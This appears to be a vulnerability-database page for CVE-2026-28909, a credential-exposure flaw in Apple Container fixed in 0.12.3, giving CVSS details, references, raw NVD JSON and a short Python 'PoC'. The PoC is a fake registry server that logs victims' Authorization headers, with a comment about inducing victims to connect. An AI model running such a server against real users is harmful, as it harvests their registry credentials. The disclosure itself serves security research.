CVE-2026-28909

Description

Users who connect to malicious registries with hostnames matching the bypass patterns will have their registry credentials exposed in plaintext. This issue is fixed in container version 0.12.3.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apple:container:*:*:*:*:*:swift:*:* - VULNERABLE

Apple Container < 0.12.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-28909: Credential Exposure via Malicious Registry
# This script simulates a malicious registry server to capture plaintext credentials.
# Attacker sets up a server listening on a port, waiting for the victim to connect.

from http.server import BaseHTTPRequestHandler, HTTPServer

class MaliciousRegistryHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Capture the Authorization header which contains the credentials
        auth_header = self.headers.get('Authorization')
        
        print(f"[+] Potential Victim Connected from: {self.client_address[0]}")
        if auth_header:
            print(f"[+] Credentials Captured (Plaintext): {auth_header}")
        else:
            print("[-] No credentials found in this request.")
            
        # Send a simple response to keep the connection alive or error out
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        self.wfile.write(b"Malicious Registry: Credentials logged.")

def run_server(port=8080):
    server_address = ('', port)
    httpd = HTTPServer(server_address, MaliciousRegistryHandler)
    print(f"[*] Starting malicious registry simulation on port {port}...")
    print(f"[*] Induce victim to connect to a hostname matching bypass patterns pointing here.")
    httpd.serve_forever()

if __name__ == "__main__":
    run_server()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-28909
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-28909
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-28909/
[4] VulDB https://vuldb.com/cve/CVE-2026-28909
[5] https://github.com/apple/container/security/advisories/GHSA-m5rp-xcpf-r8m7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-28909", "sourceIdentifier": "[email protected]", "published": "2026-04-30T23:16:20.437", "lastModified": "2026-05-04T18:22:48.623", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Users who connect to malicious registries with hostnames matching the bypass patterns will have their registry credentials exposed in plaintext. This issue is fixed in container version 0.12.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:container:*:*:*:*:*:swift:*:*", "versionEndExcluding": "0.12.3", "matchCriteriaId": "1C067E9C-6452-4283-9983-6662D48D5A83"}]}]}], "references": [{"url": "https://github.com/apple/container/security/advisories/GHSA-m5rp-xcpf-r8m7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}